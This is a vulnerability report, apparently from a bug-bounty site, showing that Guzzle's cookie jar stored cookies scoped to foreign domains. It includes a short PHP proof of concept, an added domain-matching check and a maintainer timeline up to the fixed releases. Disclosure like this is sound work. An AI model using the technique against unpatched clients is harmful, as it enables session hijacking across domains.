Set cookie for different domain in guzzle/guzzle

Valid

Reported on

May 9th 2022


Description

Guzzle's cookie jar does not check whether the Domain attribute of a cookie matches the domain of the server that set it via the Set-Cookie header, so a response from one host can store a cookie scoped to an unrelated domain.

Proof of Concept

<?php
require "vendor/autoload.php";

// A client created with "cookies" => true gets a default CookieJar that
// stores the cookies from every Set-Cookie header it receives.
$client = new \GuzzleHttp\Client(["cookies" => true]);

// The mocked endpoint answers with a Set-Cookie header whose Domain attribute
// names a host other than the one that sent the response.
$client->request("GET", "https://<id>.free.beeceptor.com/setcookie");

// Dump the jar: the cookie is stored under the foreign Domain value.
$cookies = $client->getConfig('cookies')->toArray();
print_r($cookies);
?>

You can use beeceptor to mock the endpoint; just add the following header to the response: "Set-Cookie": "poc=1; Domain=huntr.dev"

This also works with .com as the domain, which would make the client send the cookie to every .com domain.
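The check the report says is missing, written out as an added example (this is not Guzzle's code and not part of the report): the RFC 6265 domain-matching rule, plus the rule that a cookie jar must ignore a Set-Cookie whose Domain attribute does not domain-match the response host or names a bare public suffix. The function names, the host names and the short public-suffix list are constructed for illustration.

```php
<?php
// Added example, not code from Guzzle or from the report: the RFC 6265
// domain-matching rule (section 5.1.3) and the "reject non-matching or
// public-suffix Domain" rule (section 5.3, steps 5-6) that a cookie jar
// should apply before storing a cookie. Host names below are constructed.

// RFC 6265 section 5.1.3: $host domain-matches $domain when they are equal,
// or when $domain is a suffix of $host preceded by a "." and $host is not
// an IP address.
function domainMatches(string $host, string $domain): bool
{
    $host   = strtolower(rtrim($host, '.'));
    $domain = strtolower(trim($domain, '.'));
    if ($domain === '') {
        return false;
    }
    if ($host === $domain) {
        return true;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return false;
    }
    $suffix = '.' . $domain;
    return strlen($host) > strlen($suffix)
        && substr($host, -strlen($suffix)) === $suffix;
}

// Decide whether a cookie with Domain=$cookieDomain, received from
// $responseHost, may be stored. Two checks: the Domain attribute must
// domain-match the response host, and a bare public suffix is refused so
// that one response cannot plant a cookie for every ".com" site.
// The suffix list is a constructed stub; use the Public Suffix List in practice.
function cookieDomainAllowed(string $responseHost, string $cookieDomain): bool
{
    $publicSuffixes = ['com', 'net', 'org', 'dev', 'co.uk'];
    $domain = strtolower(trim($cookieDomain, '.'));
    if ($domain === '' || in_array($domain, $publicSuffixes, true)) {
        return false;
    }
    return domainMatches($responseHost, $domain);
}

// Constructed stand-in for the beeceptor host used in the proof of concept.
$responseHost = 'example.free.beeceptor.com';

// The two Domain values from the report, plus two that a correct jar accepts.
foreach (['huntr.dev', 'com', 'free.beeceptor.com', $responseHost] as $d) {
    printf("Domain=%-28s %s\n", $d,
        cookieDomainAllowed($responseHost, $d) ? 'accept' : 'reject');
}
```

Run with `php` on the command line. With the report's values, Domain=huntr.dev is rejected because it does not domain-match the beeceptor host, and Domain=com is rejected as a public suffix; a Domain equal to the response host or to one of its parent labels (above the public suffix) is accepted, which is the behaviour a patched jar should show.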

Impact

The vulnerability is capable of stealing sessions if the right conditions are met.

We are processing your report and will contact the guzzle team within 24 hours. a year ago
We have contacted a member of the guzzle team and are waiting to hear back a year ago
Graham Campbell validated this vulnerability a year ago

Thanks for reporting this. We will co-ordinate with stakeholders and provide an update within 10 working days.

myxl has been awarded the disclosure bounty
We have sent a fix follow up to the guzzle team. We will try again in 7 days. a year ago
Graham Campbell (Maintainer), a year ago:

We are aware of this issue, and we will prepare a fix next week.

We have sent a second fix follow up to the guzzle team. We will try again in 10 days. a year ago
Graham Campbell (Maintainer), a year ago:

We have a fix in progress. We will provide another update on Monday.

Graham Campbell (Maintainer), a year ago:

We have a proposed fix in place. We are sending it for 3rd party review. We expect to be able to release a fix before the end of May.

Graham Campbell (Maintainer), a year ago:

We have been allocated CVE-2022-29248.

Graham Campbell (Maintainer), a year ago:

We have just released v6.5.6 and v7.4.3 and published the advisory. This is now fixed, and the embargo is lifted.

Graham Campbell marked this as fixed in v7.4.3 with commit 74a860 a year ago
Graham Campbell has been awarded the fix bounty
This vulnerability will not receive a CVE
CookieJar.php#L160-L218 has been validated